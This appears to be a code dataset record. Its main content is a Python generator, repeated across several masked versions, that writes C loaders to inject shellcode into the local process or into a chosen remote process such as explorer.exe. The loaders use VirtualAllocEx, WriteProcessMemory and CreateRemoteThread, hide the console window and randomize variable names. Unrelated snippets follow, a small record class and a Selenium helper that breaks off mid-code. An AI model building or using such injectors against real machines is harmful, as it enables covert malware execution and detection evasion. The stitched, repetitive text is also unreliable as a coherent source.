|-----------------------------------------------------|
| Which process to inject ? (DEFAULT = explorer.exe); |
|-----------------------------------------------------|
""")
ProcessName = core.core_input()
if ProcessName != "":
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
ProcessName = "explorer.exe"
Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)
return Remote_Thread_Injection
else:
Local_Thread_Injection = End_Local_Thread_Injection()
return Local_Thread_Injection
def End_Local_Thread_Injection():
Exec = gen.Varname_Creator()
Local_Thread_Injection = "void *" + Exec + " = VirtualAlloc(0, sizeof " + Shellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);"
Local_Thread_Injection += "memcpy(" + Exec + ", " + Shellcode + ", sizeof " + Shellcode + ");"
Local_Thread_Injection += "((void(*)())" + Exec + ")();}"
return Local_Thread_Injection
def End_Remote_Thread_Injection(ProcessName):
Entry = gen.Varname_Creator()
Snapshot = gen.Varname_Creator()
Process_Handle = gen.Varname_Creator()
Remote_Thread = gen.Varname_Creator()
Remote_Buffer = gen.Varname_Creator()
Remote_Thread_Injection = "PROCESSENTRY32 " + Entry + ";"
Remote_Thread_Injection += Entry + ".dwSize = sizeof(PROCESSENTRY32);"
Remote_Thread_Injection += "HANDLE " + Snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);"
Remote_Thread_Injection += "if (Process32First(" + Snapshot + ", &" + Entry + ") == TRUE){"
Remote_Thread_Injection += "while (Process32Next(" + Snapshot + ", &" + Entry + ") == TRUE){"
Remote_Thread_Injection += 'if (stricmp(' + Entry + '.szExeFile, ' + '"' + ProcessName + '"' + ') == 0){'
Remote_Thread_Injection += "HANDLE " + Process_Handle + ";"
Remote_Thread_Injection += "HANDLE " + Remote_Thread + ";"
Remote_Thread_Injection += "PVOID " + Remote_Buffer + ";"
Remote_Thread_Injection += Process_Handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + Entry + ".th32ProcessID);"
Remote_Thread_Injection += Remote_Buffer + " = VirtualAllocEx(" + Process_Handle + ", NULL, sizeof " + Shellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);"
Remote_Thread_Injection += "WriteProcessMemory(" + Process_Handle + ", " + Remote_Buffer + ", " + Shellcode + ", sizeof " + Shellcode + ", NULL);"
Remote_Thread_Injection += Remote_Thread + " = CreateRemoteThread(" + Process_Handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + Remote_Buffer + ", NULL, 0, NULL);"
Remote_Thread_Injection += "CloseHandle(" + Process_Handle + ");}}}"
Remote_Thread_Injection += "CloseHandle(" + Snapshot + ");}"
return Remote_Thread_Injection
|
flexible
|
{
"blob_id": "e9b9f87a18a5788ac86b1e85c0f3d7858946e03a",
"index": 2999,
"step-1": "<mask token>\n\n\ndef Start():\n Start_Code = '#include <windows.h>\\n'\n Start_Code += '#include <tlhelp32.h>\\n'\n Start_Code += '#include <stdio.h>\\n'\n Start_Code += '#include <stdlib.h>\\n'\n Start_Code += '#include <string.h>\\n'\n Start_Code += 'int main(int argc, char **argv) {'\n Start_Code += 'char ' + Shellcode + '[] = {'\n return Start_Code\n\n\n<mask token>\n\n\ndef Local_Or_Remote():\n print(\n \"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\"\n )\n Choice = core.core_input()\n if Choice == '1':\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n elif Choice == '2':\n print(\n \"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? (DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\"\n )\n ProcessName = core.core_input()\n if ProcessName != '':\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n ProcessName = 'explorer.exe'\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\ndef End_Local_Thread_Injection():\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = ('void *' + Exec +\n ' = VirtualAlloc(0, sizeof ' + Shellcode +\n ', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')\n Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +\n ', sizeof ' + Shellcode + ');')\n Local_Thread_Injection += '((void(*)())' + Exec + ')();}'\n return Local_Thread_Injection\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = 
gen.Varname_Creator()\n Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'\n Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'\n Remote_Thread_Injection += ('HANDLE ' + Snapshot +\n ' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')\n Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +\n '\"' + ProcessName + '\"' + ') == 0){')\n Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'\n Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'\n Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'\n Remote_Thread_Injection += (Process_Handle +\n ' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +\n '.th32ProcessID);')\n Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +\n Process_Handle + ', NULL, sizeof ' + Shellcode +\n ', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')\n Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +\n ', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +\n ', NULL);')\n Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +\n Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +\n Remote_Buffer + ', NULL, 0, NULL);')\n Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'\n Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'\n return Remote_Thread_Injection\n",
"step-2": "<mask token>\n\n\ndef Start():\n Start_Code = '#include <windows.h>\\n'\n Start_Code += '#include <tlhelp32.h>\\n'\n Start_Code += '#include <stdio.h>\\n'\n Start_Code += '#include <stdlib.h>\\n'\n Start_Code += '#include <string.h>\\n'\n Start_Code += 'int main(int argc, char **argv) {'\n Start_Code += 'char ' + Shellcode + '[] = {'\n return Start_Code\n\n\ndef Hide_Window_Console():\n Hide_Window_Console_Code = ('};\\nHWND ' + Hide_Window +\n ' = GetConsoleWindow();')\n Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'\n return Hide_Window_Console_Code\n\n\ndef Local_Or_Remote():\n print(\n \"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\"\n )\n Choice = core.core_input()\n if Choice == '1':\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n elif Choice == '2':\n print(\n \"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? 
(DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\"\n )\n ProcessName = core.core_input()\n if ProcessName != '':\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n ProcessName = 'explorer.exe'\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\ndef End_Local_Thread_Injection():\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = ('void *' + Exec +\n ' = VirtualAlloc(0, sizeof ' + Shellcode +\n ', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')\n Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +\n ', sizeof ' + Shellcode + ');')\n Local_Thread_Injection += '((void(*)())' + Exec + ')();}'\n return Local_Thread_Injection\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = gen.Varname_Creator()\n Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'\n Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'\n Remote_Thread_Injection += ('HANDLE ' + Snapshot +\n ' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')\n Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +\n '\"' + ProcessName + '\"' + ') == 0){')\n Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'\n Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'\n Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'\n Remote_Thread_Injection += (Process_Handle +\n ' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +\n '.th32ProcessID);')\n 
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +\n Process_Handle + ', NULL, sizeof ' + Shellcode +\n ', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')\n Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +\n ', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +\n ', NULL);')\n Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +\n Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +\n Remote_Buffer + ', NULL, 0, NULL);')\n Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'\n Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'\n return Remote_Thread_Injection\n",
"step-3": "<mask token>\nShellcode = gen.Varname_Creator()\nHide_Window = gen.Varname_Creator()\n\n\ndef Start():\n Start_Code = '#include <windows.h>\\n'\n Start_Code += '#include <tlhelp32.h>\\n'\n Start_Code += '#include <stdio.h>\\n'\n Start_Code += '#include <stdlib.h>\\n'\n Start_Code += '#include <string.h>\\n'\n Start_Code += 'int main(int argc, char **argv) {'\n Start_Code += 'char ' + Shellcode + '[] = {'\n return Start_Code\n\n\ndef Hide_Window_Console():\n Hide_Window_Console_Code = ('};\\nHWND ' + Hide_Window +\n ' = GetConsoleWindow();')\n Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'\n return Hide_Window_Console_Code\n\n\ndef Local_Or_Remote():\n print(\n \"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\"\n )\n Choice = core.core_input()\n if Choice == '1':\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n elif Choice == '2':\n print(\n \"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? 
(DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\"\n )\n ProcessName = core.core_input()\n if ProcessName != '':\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n ProcessName = 'explorer.exe'\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\ndef End_Local_Thread_Injection():\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = ('void *' + Exec +\n ' = VirtualAlloc(0, sizeof ' + Shellcode +\n ', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')\n Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +\n ', sizeof ' + Shellcode + ');')\n Local_Thread_Injection += '((void(*)())' + Exec + ')();}'\n return Local_Thread_Injection\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = gen.Varname_Creator()\n Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'\n Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'\n Remote_Thread_Injection += ('HANDLE ' + Snapshot +\n ' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')\n Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +\n '\"' + ProcessName + '\"' + ') == 0){')\n Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'\n Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'\n Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'\n Remote_Thread_Injection += (Process_Handle +\n ' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +\n '.th32ProcessID);')\n 
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +\n Process_Handle + ', NULL, sizeof ' + Shellcode +\n ', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')\n Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +\n ', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +\n ', NULL);')\n Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +\n Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +\n Remote_Buffer + ', NULL, 0, NULL);')\n Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'\n Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'\n return Remote_Thread_Injection\n",
"step-4": "from lib import gen, core\nShellcode = gen.Varname_Creator()\nHide_Window = gen.Varname_Creator()\n\n\ndef Start():\n Start_Code = '#include <windows.h>\\n'\n Start_Code += '#include <tlhelp32.h>\\n'\n Start_Code += '#include <stdio.h>\\n'\n Start_Code += '#include <stdlib.h>\\n'\n Start_Code += '#include <string.h>\\n'\n Start_Code += 'int main(int argc, char **argv) {'\n Start_Code += 'char ' + Shellcode + '[] = {'\n return Start_Code\n\n\ndef Hide_Window_Console():\n Hide_Window_Console_Code = ('};\\nHWND ' + Hide_Window +\n ' = GetConsoleWindow();')\n Hide_Window_Console_Code += 'ShowWindow(' + Hide_Window + ', SW_HIDE);'\n return Hide_Window_Console_Code\n\n\ndef Local_Or_Remote():\n print(\n \"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\"\n )\n Choice = core.core_input()\n if Choice == '1':\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n elif Choice == '2':\n print(\n \"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? 
(DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\"\n )\n ProcessName = core.core_input()\n if ProcessName != '':\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n ProcessName = 'explorer.exe'\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\ndef End_Local_Thread_Injection():\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = ('void *' + Exec +\n ' = VirtualAlloc(0, sizeof ' + Shellcode +\n ', MEM_COMMIT, PAGE_EXECUTE_READWRITE);')\n Local_Thread_Injection += ('memcpy(' + Exec + ', ' + Shellcode +\n ', sizeof ' + Shellcode + ');')\n Local_Thread_Injection += '((void(*)())' + Exec + ')();}'\n return Local_Thread_Injection\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = gen.Varname_Creator()\n Remote_Thread_Injection = 'PROCESSENTRY32 ' + Entry + ';'\n Remote_Thread_Injection += Entry + '.dwSize = sizeof(PROCESSENTRY32);'\n Remote_Thread_Injection += ('HANDLE ' + Snapshot +\n ' = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);')\n Remote_Thread_Injection += ('if (Process32First(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('while (Process32Next(' + Snapshot + ', &' +\n Entry + ') == TRUE){')\n Remote_Thread_Injection += ('if (stricmp(' + Entry + '.szExeFile, ' +\n '\"' + ProcessName + '\"' + ') == 0){')\n Remote_Thread_Injection += 'HANDLE ' + Process_Handle + ';'\n Remote_Thread_Injection += 'HANDLE ' + Remote_Thread + ';'\n Remote_Thread_Injection += 'PVOID ' + Remote_Buffer + ';'\n Remote_Thread_Injection += (Process_Handle +\n ' = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ' + Entry +\n '.th32ProcessID);')\n 
Remote_Thread_Injection += (Remote_Buffer + ' = VirtualAllocEx(' +\n Process_Handle + ', NULL, sizeof ' + Shellcode +\n ', (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);')\n Remote_Thread_Injection += ('WriteProcessMemory(' + Process_Handle +\n ', ' + Remote_Buffer + ', ' + Shellcode + ', sizeof ' + Shellcode +\n ', NULL);')\n Remote_Thread_Injection += (Remote_Thread + ' = CreateRemoteThread(' +\n Process_Handle + ', NULL, 0, (LPTHREAD_START_ROUTINE)' +\n Remote_Buffer + ', NULL, 0, NULL);')\n Remote_Thread_Injection += 'CloseHandle(' + Process_Handle + ');}}}'\n Remote_Thread_Injection += 'CloseHandle(' + Snapshot + ');}'\n return Remote_Thread_Injection\n",
"step-5": "from lib import gen, core\n\n\n\nShellcode = gen.Varname_Creator()\nHide_Window = gen.Varname_Creator()\n\n\n\ndef Start():\n Start_Code = \"#include <windows.h>\\n\"\n Start_Code += \"#include <tlhelp32.h>\\n\"\n Start_Code += \"#include <stdio.h>\\n\"\n Start_Code += \"#include <stdlib.h>\\n\"\n Start_Code += \"#include <string.h>\\n\"\n Start_Code += \"int main(int argc, char **argv) {\"\n Start_Code += \"char \" + Shellcode + \"[] = {\"\n return Start_Code\n\n\n\ndef Hide_Window_Console():\n Hide_Window_Console_Code = \"};\\nHWND \" + Hide_Window + \" = GetConsoleWindow();\"\n Hide_Window_Console_Code += \"ShowWindow(\" + Hide_Window + \", SW_HIDE);\"\n return Hide_Window_Console_Code\n\n\n\ndef Local_Or_Remote():\n print(\"\"\"\n |---------------------------------------|\n | [1] Local Thread Injection (DEFAULT); |\n | [2] Remote Thread Injection; |\n |---------------------------------------| \n \"\"\")\n\n Choice = core.core_input()\n\n if Choice == \"1\":\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\n elif Choice == \"2\":\n print(\"\"\"\n |-----------------------------------------------------|\n | Which process to inject ? 
(DEFAULT = explorer.exe); |\n |-----------------------------------------------------| \n \"\"\")\n\n ProcessName = core.core_input()\n\n if ProcessName != \"\":\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n\n else:\n ProcessName = \"explorer.exe\"\n Remote_Thread_Injection = End_Remote_Thread_Injection(ProcessName)\n return Remote_Thread_Injection\n\n\n else:\n Local_Thread_Injection = End_Local_Thread_Injection()\n return Local_Thread_Injection\n\n\n\ndef End_Local_Thread_Injection():\n\n Exec = gen.Varname_Creator()\n Local_Thread_Injection = \"void *\" + Exec + \" = VirtualAlloc(0, sizeof \" + Shellcode + \", MEM_COMMIT, PAGE_EXECUTE_READWRITE);\"\n Local_Thread_Injection += \"memcpy(\" + Exec + \", \" + Shellcode + \", sizeof \" + Shellcode + \");\"\n Local_Thread_Injection += \"((void(*)())\" + Exec + \")();}\"\n return Local_Thread_Injection\n\n\n\ndef End_Remote_Thread_Injection(ProcessName):\n\n Entry = gen.Varname_Creator()\n Snapshot = gen.Varname_Creator()\n Process_Handle = gen.Varname_Creator()\n Remote_Thread = gen.Varname_Creator()\n Remote_Buffer = gen.Varname_Creator()\n\n Remote_Thread_Injection = \"PROCESSENTRY32 \" + Entry + \";\"\n Remote_Thread_Injection += Entry + \".dwSize = sizeof(PROCESSENTRY32);\"\n Remote_Thread_Injection += \"HANDLE \" + Snapshot + \" = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\"\n Remote_Thread_Injection += \"if (Process32First(\" + Snapshot + \", &\" + Entry + \") == TRUE){\"\n Remote_Thread_Injection += \"while (Process32Next(\" + Snapshot + \", &\" + Entry + \") == TRUE){\"\n Remote_Thread_Injection += 'if (stricmp(' + Entry + '.szExeFile, ' + '\"' + ProcessName + '\"' + ') == 0){'\n Remote_Thread_Injection += \"HANDLE \" + Process_Handle + \";\"\n Remote_Thread_Injection += \"HANDLE \" + Remote_Thread + \";\"\n Remote_Thread_Injection += \"PVOID \" + Remote_Buffer + \";\"\n Remote_Thread_Injection += Process_Handle + \" = 
OpenProcess(PROCESS_ALL_ACCESS, FALSE, \" + Entry + \".th32ProcessID);\"\n Remote_Thread_Injection += Remote_Buffer + \" = VirtualAllocEx(\" + Process_Handle + \", NULL, sizeof \" + Shellcode + \", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\"\n Remote_Thread_Injection += \"WriteProcessMemory(\" + Process_Handle + \", \" + Remote_Buffer + \", \" + Shellcode + \", sizeof \" + Shellcode + \", NULL);\"\n Remote_Thread_Injection += Remote_Thread + \" = CreateRemoteThread(\" + Process_Handle + \", NULL, 0, (LPTHREAD_START_ROUTINE)\" + Remote_Buffer + \", NULL, 0, NULL);\"\n Remote_Thread_Injection += \"CloseHandle(\" + Process_Handle + \");}}}\"\n Remote_Thread_Injection += \"CloseHandle(\" + Snapshot + \");}\"\n\n return Remote_Thread_Injection",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import datetime
class Dato:
    """Simple record exposing id, dato, tipo and fecha via accessor pairs.

    Each field is stored privately and read/written exclusively through
    its getXxx/setXxx method.
    """

    def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime):
        self._id = id
        self._dato = dato
        self._tipo = tipo
        self._fecha = fecha

    def getId(self):
        """Return the numeric identifier."""
        return self._id

    def setId(self, id):
        """Replace the numeric identifier."""
        self._id = id

    def getDato(self):
        """Return the stored datum string."""
        return self._dato

    def setDato(self, dato):
        """Replace the stored datum string."""
        self._dato = dato

    def getTipo(self):
        """Return the type tag."""
        return self._tipo

    def setTipo(self, tipo):
        """Replace the type tag."""
        self._tipo = tipo

    def getFecha(self):
        """Return the associated timestamp."""
        return self._fecha

    def setFecha(self, fecha):
        """Replace the associated timestamp."""
        self._fecha = fecha
|
normal
|
{
"blob_id": "95256390e1e7e9227b96dccce33082de9d2cddd3",
"index": 5158,
"step-1": "<mask token>\n\n\nclass Dato:\n <mask token>\n <mask token>\n\n def setId(self, id):\n self.__id = id\n <mask token>\n\n def setDato(self, dato):\n self.__dato = dato\n <mask token>\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha\n",
"step-2": "<mask token>\n\n\nclass Dato:\n\n def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime\n ):\n self.__id = id\n self.__dato = dato\n self.__tipo = tipo\n self.__fecha = fecha\n <mask token>\n\n def setId(self, id):\n self.__id = id\n <mask token>\n\n def setDato(self, dato):\n self.__dato = dato\n <mask token>\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha\n",
"step-3": "<mask token>\n\n\nclass Dato:\n\n def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime\n ):\n self.__id = id\n self.__dato = dato\n self.__tipo = tipo\n self.__fecha = fecha\n\n def getId(self):\n return self.__id\n\n def setId(self, id):\n self.__id = id\n <mask token>\n\n def setDato(self, dato):\n self.__dato = dato\n\n def getTipo(self):\n return self.__tipo\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha\n",
"step-4": "<mask token>\n\n\nclass Dato:\n\n def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime\n ):\n self.__id = id\n self.__dato = dato\n self.__tipo = tipo\n self.__fecha = fecha\n\n def getId(self):\n return self.__id\n\n def setId(self, id):\n self.__id = id\n\n def getDato(self):\n return self.__dato\n\n def setDato(self, dato):\n self.__dato = dato\n\n def getTipo(self):\n return self.__tipo\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha\n",
"step-5": "import datetime\n\nclass Dato:\n def __init__(self, id: int, dato: str, tipo: str, fecha: datetime.datetime):\n self.__id = id\n self.__dato = dato\n self.__tipo = tipo\n self.__fecha = fecha\n\n def getId(self):\n return self.__id\n\n def setId(self, id):\n self.__id = id\n\n def getDato(self):\n return self.__dato\n\n def setDato(self, dato):\n self.__dato = dato\n\n def getTipo(self):\n return self.__tipo\n\n def setTipo(self, tipo):\n self.__tipo = tipo\n\n def getFecha(self):\n return self.__fecha\n\n def setFecha(self, fecha):\n self.__fecha = fecha",
"step-ids": [
6,
7,
9,
10,
12
]
}
|
[
6,
7,
9,
10,
12
] |
<|reserved_special_token_0|>
class Base:
<|reserved_special_token_0|>
def open_url(self, url):
self.driver.get(url)
self.driver.maximize_window()
def find_element(self, locator, timeout=10):
element = WebDriverWait(self.driver, timeout).until(EC.
presence_of_element_located(locator))
return element
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def send_keys(self, locator, text, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.clear()
element.send_keys(text)
def is_text_in_element(self, locator, text, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element(locator, text))
return result
except:
return False
def is_value_in_element(self, locator, value, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element_value(locator, value))
return result
except:
return False
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Base:
def __init__(self, driver):
self.driver = driver
def open_url(self, url):
self.driver.get(url)
self.driver.maximize_window()
def find_element(self, locator, timeout=10):
element = WebDriverWait(self.driver, timeout).until(EC.
presence_of_element_located(locator))
return element
def find_elements(self, locator, timeout=10):
elements = WebDriverWait(self.driver, timeout).until(EC.
presence_of_all_elements_located(locator))
return elements
<|reserved_special_token_0|>
def send_keys(self, locator, text, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.clear()
element.send_keys(text)
def is_text_in_element(self, locator, text, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element(locator, text))
return result
except:
return False
def is_value_in_element(self, locator, value, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element_value(locator, value))
return result
except:
return False
def close_browser(self):
self.driver.quit()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def open_browser(browser='chrome'):
driver = None
if browser == 'chrome':
driver = webdriver.Chrome()
elif browser == 'firefox':
driver = webdriver.Firefox()
elif browser == 'ie':
driver = webdriver.Ie()
else:
print("请输入正确的浏览器,例如'chrome','Firefox','ie'")
return driver
class Base:
def __init__(self, driver):
self.driver = driver
def open_url(self, url):
self.driver.get(url)
self.driver.maximize_window()
def find_element(self, locator, timeout=10):
element = WebDriverWait(self.driver, timeout).until(EC.
presence_of_element_located(locator))
return element
def find_elements(self, locator, timeout=10):
elements = WebDriverWait(self.driver, timeout).until(EC.
presence_of_all_elements_located(locator))
return elements
def click(self, locator, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.click()
def send_keys(self, locator, text, timeout=10):
element = self.find_element(locator=locator, timeout=timeout)
element.clear()
element.send_keys(text)
def is_text_in_element(self, locator, text, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element(locator, text))
return result
except:
return False
def is_value_in_element(self, locator, value, timeout=10):
try:
result = WebDriverWait(self.driver, timeout=timeout).until(EC.
text_to_be_present_in_element_value(locator, value))
return result
except:
return False
def close_browser(self):
self.driver.quit()
<|reserved_special_token_1|>
import time
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
def open_browser(browser='chrome'):
    """Create and return a Selenium WebDriver for the named browser.

    Recognized (case-sensitive) names are 'chrome', 'firefox' and 'ie';
    any other value prints a usage hint and returns None.
    """
    factory_names = {'chrome': 'Chrome', 'firefox': 'Firefox', 'ie': 'Ie'}
    if browser in factory_names:
        # resolve the factory lazily so unknown names never touch webdriver
